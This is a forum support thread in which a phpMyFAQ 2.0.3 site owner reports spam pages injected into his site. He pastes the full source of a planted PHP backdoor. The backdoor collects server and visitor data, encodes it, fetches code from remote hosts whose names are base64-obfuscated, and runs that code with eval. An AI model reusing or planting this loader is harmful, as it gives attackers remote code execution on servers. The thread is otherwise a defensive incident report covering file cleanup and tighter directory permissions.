phpmyfaq being hacked via inc directory

[bigassgrin]

Hello.

I found a couple of pages created in the inc directory that have me confused.

tummytemple.com/faq/inc/jennifer-lopez-video-dawnload.html
http://tummytemple.com/faq/inc/Bc+Highway+Cams.html

I went into the directory via an ftp program and do not see these html files.

Any thoughts as to how this is happening and how come I can't see the html files?

Thanks to anyone that can help.

Tim

[Thorsten]

Hi,

which version do you use?

bye
Thorsten

[bigassgrin]

I'm using 2.0.3

[bigassgrin]

If you would like to see even more compromises to our server via phpmyfaq check out the following url

http://www.google.com/search?hl=en&lr=& ... tnG=Search

This does a search on our server for the word "Jennifer". I can only imagine how many other pages are created.

Any help here is truly appreciated.

Thanks!

[bigassgrin]

I found the following php files and thought they looked odd

1) in the inc directory - 44658.php
2) in the data directory - 161182.php

The code for the 44658 is:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);if((include(base64_decode("aHR0cDovLw==").base64_decode("YS5waHB0YWdzLndz")."/?".$str)));else if(include(base64_decode("aHR0cDovLw==").base64_decode("Yi5waHB0YWdzLndz")."/?".$str));else if($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3MvPw==").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

I changed the name of the php file and the pages listed on google went dead. These php files are definitely the culprit.

I followed a lead to an ip address that shows that they create the phps for website owners to generate traffic and revenue. They had a link to report abuse. I filled it out but don't expect much.

I'm just concerned that there is clearly a security breach via phpmyfaq that others might be searching for via bots, hacking and using.

Thanks for any thoughts/help.

Tim

[bigassgrin]

Just a heads up!

[bigassgrin]

I took a look more deeply into the directories. What I saw was that the php files were uploaded all at the same time on the same day.

I searched for other directories that showed "last modified" on the same date and times and found more of these numeric (e.g. 234324.php) files. Clearly these folks did not stay in alignment with your great php descriptions. So it made it easy to pick them out and neutralizing them.

All of the places they were located were in directories with 777 permissions. I changed them all to 775 to eliminate the ability for public write permissions. I hope this offers better protection on my end.

The only thing I don't know is will phpMyFAQ work with those folders on 775 vs. 777. And, if this is the case, did I miss something in the installation guidelines to secure the folders?

Again, thoughts and guidance appreciated.

Tim